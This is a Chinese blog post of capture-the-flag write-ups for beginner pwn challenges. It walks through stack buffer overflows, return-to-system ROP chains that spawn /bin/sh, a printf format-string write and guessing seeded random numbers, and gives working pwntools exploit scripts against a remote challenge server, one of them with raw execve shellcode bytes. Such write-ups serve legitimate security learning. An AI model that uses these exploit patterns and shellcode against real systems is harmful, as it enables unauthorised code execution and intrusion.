功防世界-pwn-新手练习(更新中)

版权声明：本文为博主原创文章，转载需注明出处。 https://blog.csdn.net/zz_Caleb/article/details/88982793

1、CGfsb：https://blog.csdn.net/zz_Caleb/article/details/88980866

2、when_did_you_born（简单的ROP）

下载文件，是一个64位的elf文件，放到ida中看伪码，报错：

 搜了一下这个问题，是栈的问题，可以通过修改一些设置来解决，但是，找到了main函数：

 在这个地方查看伪码不会报错，而且主函数的源码可以得到：

分析一下伪码，v5==1926会让我们拿到flag，但是，前面对v5进行了过滤，所以我们再输入的时候就不能把v5的值输成1926，那怎么办呢？我们看到最前面给出了v4和v5的位置：

char v4; // [rsp+0h] [rbp-20h]
unsigned int v5; // [rsp+8h] [rbp-18h]

所以v5比v4的地址大了8位，而在输入v4的时候用的是gets函数，不会对输入的字符串长度进行限制，所以我们可以利用变量的溢出，将溢出的数据覆盖v5使v5的值为1926，构造payload = "A"*8 + p32(1926)即可。

下面给出脚本：
 

from pwn import *

p = remote('111.198.29.45', 31788)
p.sendlineafter('Birth?\n', '1998')
payload = 'AAAAAAAA' + p32(1926)
p.sendlineafter('Name?\n', payload)
print(p.recvall())

运行结果：

4、hello_pwn

64位elf文件，ida查看伪码：

 看一下这个sub_400686()函数：

所以我们的目标就是让dword_60106C == 1853186401，read(0, &unk_601068, 0x10uLL)是将键盘输入的数据存储到unk_601068中，我们看一下unk_601068的位置发现unk_601068和dword_60106C 的位置只相差4：

 我们可以对unk_601068进行输入，而且这里也是不限定输入长度的，所以我们可以输入unk_601068使其溢出来把1853186401覆盖到dword_60106C上。

下面给出溢出脚本：

from pwn import *

p  = remote('111.198.29.45', 31876)
payload = 'AAAA' + p64(1853186401)
p.recvuntil('helloworld for bof\n')
p.send(payload)
print(p.recv())

5、level0

checksec分析保护机制:

 可以看到canary和PIE是关闭的，也就是说我们栈中的数据是不被执行的，所以我们虽然仍可进行栈溢出的操作，但是确不能把shellcode写到栈中。

ida查看伪码：

 再看看vulnerable_function()这个函数：

 有个Hello, World字符串，还有就是可以接受键盘输入的数据存到buf中。

我们可以这样来查看一些有用的字符串：

可以看到这里有个/bin/sh的字符串：

 查看这个字符串的位置：

 可以看到是执行了command，我们看看这个指令令是在哪被执行的(可以直接选定command按x，也可以右键进行选择)：

在command指令调用之后，调用了系统，如果我们可以把vulnerable_function()的返回地址改为这个指令的地址，那么我们就可以调用系统，得到系统的shell，当然还是利用溢出。

那么我们就需要确定栈顶地址了，利用溢出确定溢出点的位置就可以了，需要用到pattern工具(有单独的py文件，当然，peda插件中也有)，生成一个长度为150的字符串，然后输入程序使其溢出：

然后可以看到一些反馈信息：

 可以看到rsp，也就是栈顶的信息，也得到了串中溢出的部分，然后计算溢出点（两种方法：有无peda插件）:
使用peda插件的话：

 如果没有peda插件，就要使用指令x/gx $rsp来查看栈顶信息了，然后依然用pattern的offset指令来计算溢出点。

这里可以看到溢出点是136，所以payload就是：payload='A'*0x88 + p64(elf.symbols[callsystem])

给出shellcode：
 

from pwn import *

elf = ELF('./level0')
p = remote('111.198.29.45', 32353)
payload = 'A' * 0x88 + p64(elf.symbols['callsystem'])

p.send(payload)
p.interactive()

拿到权限后查看flag文件即可。

6、level2

下载文件，是一个32位的文件：

NX打开，说明栈中的数据没有执行权限，call esp或者jmp esp的方法就不能使用，但是可以利用rop这种方法绕过

栈中不能写shellcode了。

ida查看伪码：
main函数：

再看下vulnerable_function()函数：

在vulnerable_function()函数中，我们可以对buf进行输入，这就是个可以栈溢出的利用点。
接着查看一下有用的字符串：

 找到了/bin/sh字符串，然后还有main函数中调用的有可以执行系统命令的system函数：

 那么这里的ROP怎么用呢？对buf进行输入(伪码中给出buf的长度：88h)，将其溢出，覆盖掉ebp，将返回地址写成system函数的地址来执行system函数，然后随便写个字符串覆盖掉system函数的返回地址，然后把/bin/sh地址覆盖到system函数的返回地址的上面，这样/bin/sh就当做system函数的参数来执行了。

 buf的输入时调用的read函数，read函数有三个参数，buf是第二个，我们的目的是覆盖Return Address地址到system函数的地址。

payload='a' * 0x88 + 'aaaa' + p32(sys_addr) + p32(0x12345678) + p32(bin_addr)

'a' * 0x88-->填充buf
'aaaa'-->使buf溢出，这部分填充到read函数的第一个参数进行覆盖，是随意字符串
p32(sys_addr)-->system函数的地址，覆盖到了当前函数的返回地址上
p32(0x12345678)-->写在system函数的ebp上，以便下面写入参数的地址，现在对于system函数，read函数就相当于是Caller's Caller's ebp
p32(bin_addr)-->写在system函数参数的地址上，等待调用

shellcode：
 

from pwn import *

p = remote('111.198.29.45', 31065)
elf = ELF('./level2')
sys_addr = elf.symbols['system']
bin_addr = elf.search('/bin/sh').next()

payload = 'a' * 0x88 + 'aaaa' + p32(sys_addr) + p32(0x12345678) + p32(bin_addr)
p.recvline()
p.sendline(payload)
p.interactive()

7、string

64为的elf文件，丢进ida进行分析，将大致流程看一遍，然后找利用点:

sub_400D72()函数：

 这里面还有三个函数，都截图吧：
sub_400A7D()：

sub_400BB9()函数：

sub_400CA6((_DWORD *)a1)函数：

sub_400CA6函数这里可以看到：

 v1被转化为指针来调用，而且上面也让输入v1，我们可以把shellcode输入到v1中，这样shellcode就可以执行了，现在我们要满足的条件是*a1 == a1[1]，也就是a[0] == a[1]，从函数传参来看，a就是main函数中的v4，而v4等于v3，所以我们需要更改v4得到值使两个元素相等，可以利用sub_400BB9()函数中的printf格式化字符串漏洞来实现：

 为什么要画出来v2的输入呢，在64位的系统中，函数前6个参数依次保存在rdi、rsi、rdx、rcx、r8和r9寄存器中（也就是说，若使用”x$”，当1<=x<=6时，指向的应该依次是上述这6个寄存器中保存的数值），而从第7个参数开始，依然会保存在栈中。故若使用”x$”，则从x=7开始，我们就可以指向栈中数据了。在printf(&format, &format)前面设置断点，看看v2的输入在不在栈中，要求输入address时我们输入1234，然后进行调试：

在rsp中我们看到了0x4d2，这时1234的十六进制，所以输入的v2是在栈中的，而且是第7个参数($7)我们可以把v4的地址输入到这里，也就是让栈中的$7指向v4，然后利用格式化字符串漏洞把$7修改为85即可，下面是脚本：
 

from pwn import *

p = remote('111.198.29.45', 30216)
p.recvuntil('secret[0] is ')
addr = int(p.recvuntil('\n')[:-1], 16)
log.success("addr: \n" + hex(addr))
p.sendlineafter('name be:\n', "a")
p.sendlineafter("east or up?:\n", 'east')
p.sendlineafter("or leave(0)?:\n", '1')
p.sendlineafter("address\'\n", str(addr))
p.sendlineafter("wish is:\n", "%85c%7$n")
#shellcode = asm(shellcraft.sh())  cannot use
shellcode ='\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05'
#print(shellcode)
p.sendlineafter("YOU SPELL\n", shellcode)
#sleep(0.1)
p.interactive()

8、guess_num

64位的elf文件，ida查看源码：

 sub_C3E()函数：

 只要我们能一直执行程序，不在for循环中exit，就能拿到flag，这就需要我们在每一次循环中都传递v5且传递的值和v7一样，随机种子用的是seed[0]，我们可以看到：

unsigned int seed[2]; // [rsp+30h] [rbp-10h]
char v8; // [rsp+10h] [rbp-30h]

seed和v8在栈中的情况如图：
两者中间相差了2个16进制的数

给出脚本：

from pwn import *
from ctypes import *
libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")

p = remote("111.198.29.45", 30070)
payload = 'a' * 0x20 + p64(1)
p.sendlineafter("name:", payload)
libc.srand(1)
for i in range(10):
    p.sendlineafter("number:", str(libc.rand()%6 + 1))
    print(p.recv())
print(p.recv())